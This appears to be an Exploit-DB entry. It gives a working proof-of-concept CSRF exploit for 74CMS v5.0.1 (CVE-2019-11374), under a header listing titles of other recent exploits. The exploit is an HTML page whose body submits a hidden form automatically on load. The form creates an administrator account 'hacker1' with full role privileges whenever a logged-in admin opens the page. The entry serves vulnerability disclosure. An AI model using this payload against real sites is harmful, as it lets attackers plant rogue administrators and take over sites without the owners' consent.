
10 changes to exploits/shellcodes Ease Audio Converter 5.30 - '.mp4' Denial of Service (PoC) QNAP myQNAPcloud Connect 1.3.4.0317 - 'Username/Password' Denial of Service Google Chrome 73.0.3683.103 V8 JavaScript Engine - Out-of-Memory in Invalid Table Size Denial of Service (PoC) LabF nfsAxe 3.7 Ping Client - 'Host IP' Buffer Overflow (Direct Ret) ManageEngine Applications Manager 14.0 - Authentication Bypass / Remote Command Execution (Metasploit) WordPress Plugin Contact Form Builder 1.0.67 - Cross-Site Request Forgery / Local File Inclusion 74CMS 5.0.1 - Cross-Site Request Forgery (Add New Admin User) Msvod 10 - Cross-Site Request Forgery (Change User Information) UliCMS 2019.2 / 2019.1 - Multiple Cross-Site Scripting Linux/ARM - Password-Protected Reverse TCP Shellcode (100 bytes)
55 lines
No EOL
1.1 KiB
HTML
55 lines
No EOL
1.1 KiB
HTML
# Exploit Title: 74CMS v5.0.1 has a CSRF vulnerability to add a new admin user
|
|
# Date: 2019-04-14
|
|
# Exploit Author: ax8
|
|
# Vendor Homepage: https://github.com/Li-Siyuan
|
|
# Software Link: http://www.74cms.com/download/index.html
|
|
# Version: v5.0.1
|
|
# CVE : CVE-2019-11374
|
|
|
|
|
|
|
|
74CMS v5.0.1 has a CSRF vulnerability to add a new admin user via the index.php?m=Admin&c=admin&a=add URI.
|
|
|
|
|
|
|
|
<!--poc.html(creat a administrater)-->
|
|
|
|
<!DOCTYPE html>
|
|
|
|
<html>
|
|
|
|
<head>
|
|
|
|
<title> CSRF Proof</title>
|
|
|
|
<script type="text/javascript">
|
|
|
|
function exec1(){
|
|
|
|
document.getElementById('form1').submit();
|
|
|
|
}
|
|
|
|
</script>
|
|
|
|
</head>
|
|
|
|
<body onload="exec1();">
|
|
|
|
<form id="form1" action="http://localhost/index.php?m=Admin&c=admin&a=add" method="POST">
|
|
|
|
<input type="hidden" name="username" value="hacker1" />
|
|
|
|
<input type="hidden" name="email" value="111111111@qq.com" />
|
|
|
|
<input type="hidden" name="password" value="hacker1" />
|
|
|
|
<input type="hidden" name="repassword" value="hacker1" />
|
|
|
|
<input type="hidden" name="role_id" value="1" />
|
|
|
|
</form>
|
|
|
|
</body>
|
|
|
|
</html> |